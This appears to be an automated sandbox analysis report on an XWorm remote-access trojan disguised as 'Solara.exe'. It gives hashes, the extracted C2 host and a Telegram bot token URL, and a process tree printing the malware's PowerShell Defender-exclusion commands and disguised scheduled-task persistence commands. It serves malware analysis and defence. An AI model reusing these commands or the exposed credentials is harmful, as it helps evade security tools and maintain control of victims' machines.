Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    10/10/2024, 09:06 UTC

General

  • Target

    Solara.exe

  • Size

    796KB

  • MD5

    e91f3ec430934cf29cda88d9b730d893

  • SHA1

    6453d1f200f568b7964861c683a4f519431a9468

  • SHA256

    4960838a390adf1ea412850ca14f15ce7c201fa967c0089df97742ee517ed0fe

  • SHA512

    cc6afc8a20943ef7d18aaddde9f9257dbd7d0913aeb5ef66734cd593e580ecddde7a0706e4415c202655536b0665ce81116fd5ed487d3311caa10b33fbb7406b

  • SSDEEP

    12288:wyveQB/fTHIGaPkKEYzURNAwbAg/KyEbx/j76eLaOfqPCm+3KP8ps1uZ:wuDXTIGaPhEYzUzA0kyE1jue+AvUG

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:1764

cash-hispanic.gl.at.ply.gg:1764

Attributes
  • Install_directory

    %AppData%

  • install_file

    explorer.exe

  • telegram

    https://api.telegram.org/bot8013268995:AAHt5-BJsAIEM9hnoTy17y1WYC4NnCMU398/sendMessage?chat_id=5405936031

Signatures

  • Detect Xworm Payload 3 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 12 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 7 IoCs
  • Windows security modification 2 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Solara.exe
    "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Users\Admin\AppData\Local\Temp\BootstrapperV21.exe
      "C:\Users\Admin\AppData\Local\Temp\BootstrapperV21.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:780
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BootstrapperV21.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2888
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BootstrapperV21.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2720
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2648
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2936
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:3004
      • C:\Users\Admin\AppData\Local\Temp\cxtczt.exe
        "C:\Users\Admin\AppData\Local\Temp\cxtczt.exe"
        3⤵
        • UAC bypass
        • Windows security bypass
        • Event Triggered Execution: Image File Execution Options Injection
        • Executes dropped EXE
        • Windows security modification
        • Adds Run key to start application
        • Checks whether UAC is enabled
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:576
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /tn "GoogleUpdateTaskMachineUK" /sc MINUTE /mo 1 /tr "C:\Users\Admin\AppData\Local\Temp\cxtczt.exe" /rl HIGHEST /f
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2416
          • C:\Windows\system32\schtasks.exe
            schtasks /create /tn "GoogleUpdateTaskMachineUK" /sc MINUTE /mo 1 /tr "C:\Users\Admin\AppData\Local\Temp\cxtczt.exe" /rl HIGHEST /f
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1748
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cxtczt.exe'"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2232
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /delete /f /tn "explorer"
        3⤵
          PID:1296
      • C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2500
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2500 -s 1072
          3⤵
          • Loads dropped DLL
          PID:1936
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {095CC137-2BED-481F-B0C3-93229DF35FA0} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1756
      • C:\Users\Admin\AppData\Roaming\explorer.exe
        C:\Users\Admin\AppData\Roaming\explorer.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2088
      • C:\Users\Admin\AppData\Local\Temp\cxtczt.exe
        C:\Users\Admin\AppData\Local\Temp\cxtczt.exe
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2804
    • C:\Windows\explorer.exe
      explorer.exe
      1⤵
      • Boot or Logon Autostart Execution: Active Setup
      • Suspicious use of AdjustPrivilegeToken
      PID:1868

    Network

    • flag-us
      DNS
      getsolara.dev
      Bootstrapper.exe
      Remote address:
      8.8.8.8:53
      Request
      getsolara.dev
      IN A
      Response
      getsolara.dev
      IN A
      104.21.93.27
      getsolara.dev
      IN A
      172.67.203.125
    • flag-us
      DNS
      api.telegram.org
      BootstrapperV21.exe
      Remote address:
      8.8.8.8:53
      Request
      api.telegram.org
      IN A
      Response
      api.telegram.org
      IN A
      149.154.167.220
    • flag-us
      DNS
      api.telegram.org
      BootstrapperV21.exe
      Remote address:
      8.8.8.8:53
      Request
      api.telegram.org
      IN A
    • flag-us
      DNS
      cash-hispanic.gl.at.ply.gg
      BootstrapperV21.exe
      Remote address:
      8.8.8.8:53
      Request
      cash-hispanic.gl.at.ply.gg
      IN A
      Response
      cash-hispanic.gl.at.ply.gg
      IN A
      147.185.221.23
    • 104.21.93.27:443
      getsolara.dev
      tls
      Bootstrapper.exe
      399 B
      219 B
      6
      5
    • 149.154.167.220:443
      api.telegram.org
      tls
      BootstrapperV21.exe
      440 B
      219 B
      6
      5
    • 127.0.0.1:1764
      BootstrapperV21.exe
    • 127.0.0.1:1764
      BootstrapperV21.exe
    • 147.185.221.23:1764
      cash-hispanic.gl.at.ply.gg
      BootstrapperV21.exe
      13.9kB
      664.4kB
      283
      536
    • 147.185.221.23:1764
      cash-hispanic.gl.at.ply.gg
      BootstrapperV21.exe
      4.1MB
      66.3kB
      3303
      934
    • 8.8.8.8:53
      getsolara.dev
      dns
      Bootstrapper.exe
      59 B
      91 B
      1
      1

      DNS Request

      getsolara.dev

      DNS Response

      104.21.93.27
      172.67.203.125

    • 8.8.8.8:53
      api.telegram.org
      dns
      BootstrapperV21.exe
      124 B
      78 B
      2
      1

      DNS Request

      api.telegram.org

      DNS Request

      api.telegram.org

      DNS Response

      149.154.167.220

    • 8.8.8.8:53
      cash-hispanic.gl.at.ply.gg
      dns
      BootstrapperV21.exe
      72 B
      88 B
      1
      1

      DNS Request

      cash-hispanic.gl.at.ply.gg

      DNS Response

      147.185.221.23

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe

      Filesize

      796KB

      MD5

      4b94b989b0fe7bec6311153b309dfe81

      SHA1

      bb50a4bb8a66f0105c5b74f32cd114c672010b22

      SHA256

      7c4283f5e620b2506bcb273f947def4435d95e143ae3067a783fd3adc873a659

      SHA512

      fbbe60cf3e5d028d906e7d444b648f7dff8791c333834db8119e0a950532a75fda2e9bd5948f0b210904667923eb7b2c0176140babc497955d227e7d80fb109d

    • C:\Users\Admin\AppData\Local\Temp\BootstrapperV21.exe

      Filesize

      77KB

      MD5

      b3a1a7ef45c3a920f515adc541ee75f4

      SHA1

      fa69e1c57709dfa076e792509e6c77d297e47664

      SHA256

      5cb0406be361324ecaeaa54238d82b24dffdfff8ae35dd2a59301e83e71d9d79

      SHA512

      8628cbac85e04d9f0ada20e6f46c74d3e22edda7095043e1f61bcfd7836b54f29f4dde6de6c72309fd8f7cf66a2d69d1fe7288914a213c35b1d40f7d98e4271c

    • C:\Users\Admin\AppData\Local\Temp\cxtczt.exe

      Filesize

      542KB

      MD5

      404b26070f0fe4a1a06df0240dfb4147

      SHA1

      de1b64a42e5e99737bb479de0746acf0882699ef

      SHA256

      cd5c0002b2ffbca152a0b377b5cb4aaf8e0d904d15a72224ab55094cf729603d

      SHA512

      60cbd8763e4a3a169f25997b8c9baf3c6f25283a8b166851a7d3c75af791cf36776a79d53f96a7465bfcf762e09980ed12573c1b374c0ed4ab62851e6de7a4d7

    • C:\Users\Admin\AppData\Local\Temp\tmp587C.tmp.bat

      Filesize

      167B

      MD5

      524eadd00c9a49e24f463cbb02e17af7

      SHA1

      602412c44803c175f0f7bea198e75c405483dbf0

      SHA256

      884ac5f002f572b7e4712db749dab636accf91a798642859e089f86a37a6f0d2

      SHA512

      153bee4cbff684d29f226e24ad719d376e5206e0be19c64b3fae4b665fab2e6fb8d13984ee7b90e0a3d102719015d2bde997725e715b4b4ebbba4e1ff4bec1b0

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M5SC1VTZT4RREYU7RVYL.temp

      Filesize

      7KB

      MD5

      e0fdaf1f278467b95803d8be6f0a8836

      SHA1

      5ed21e1ecf72957eafaab9f8c799805db1dea75e

      SHA256

      4d41abc5da8170596702ad5c9657d9eb3e851851ab2fb13817298f8d9088b095

      SHA512

      b82c39ee1056da8f6189917d8b2fe9dd60d1fd4d430e69bdd11328ab4d39a0651dee65cec20604e45b73370218793661b237b470835fbafde3cd30f29e6740c9

    • memory/576-135-0x0000000000400000-0x00000000005C9000-memory.dmp

      Filesize

      1.8MB

    • memory/576-156-0x0000000000400000-0x00000000005C9000-memory.dmp

      Filesize

      1.8MB

    • memory/576-98-0x0000000000400000-0x00000000005C9000-memory.dmp

      Filesize

      1.8MB

    • memory/576-99-0x0000000000400000-0x00000000005C9000-memory.dmp

      Filesize

      1.8MB

    • memory/576-175-0x0000000000400000-0x00000000005C9000-memory.dmp

      Filesize

      1.8MB

    • memory/576-71-0x0000000000400000-0x00000000005C9000-memory.dmp

      Filesize

      1.8MB

    • memory/576-196-0x0000000000400000-0x00000000005C9000-memory.dmp

      Filesize

      1.8MB

    • memory/780-59-0x000007FEF57C0000-0x000007FEF61AC000-memory.dmp

      Filesize

      9.9MB

    • memory/780-23-0x000007FEF57C0000-0x000007FEF61AC000-memory.dmp

      Filesize

      9.9MB

    • memory/780-65-0x0000000001F50000-0x0000000001F5C000-memory.dmp

      Filesize

      48KB

    • memory/780-22-0x0000000000910000-0x000000000092A000-memory.dmp

      Filesize

      104KB

    • memory/2088-63-0x00000000001C0000-0x00000000001DA000-memory.dmp

      Filesize

      104KB

    • memory/2232-78-0x000000001B670000-0x000000001B952000-memory.dmp

      Filesize

      2.9MB

    • memory/2232-79-0x0000000002240000-0x0000000002248000-memory.dmp

      Filesize

      32KB

    • memory/2500-20-0x000007FEF57C3000-0x000007FEF57C4000-memory.dmp

      Filesize

      4KB

    • memory/2500-58-0x000007FEF57C0000-0x000007FEF61AC000-memory.dmp

      Filesize

      9.9MB

    • memory/2500-21-0x0000000000940000-0x0000000000A0E000-memory.dmp

      Filesize

      824KB

    • memory/2500-24-0x000007FEF57C0000-0x000007FEF61AC000-memory.dmp

      Filesize

      9.9MB

    • memory/2720-36-0x000000001B660000-0x000000001B942000-memory.dmp

      Filesize

      2.9MB

    • memory/2720-37-0x0000000002350000-0x0000000002358000-memory.dmp

      Filesize

      32KB

    • memory/2804-118-0x0000000000400000-0x00000000005C9000-memory.dmp

      Filesize

      1.8MB

    • memory/2804-117-0x0000000000400000-0x00000000005C9000-memory.dmp

      Filesize

      1.8MB

    • memory/2888-30-0x0000000002240000-0x0000000002248000-memory.dmp

      Filesize

      32KB

    • memory/2888-29-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

      Filesize

      2.9MB
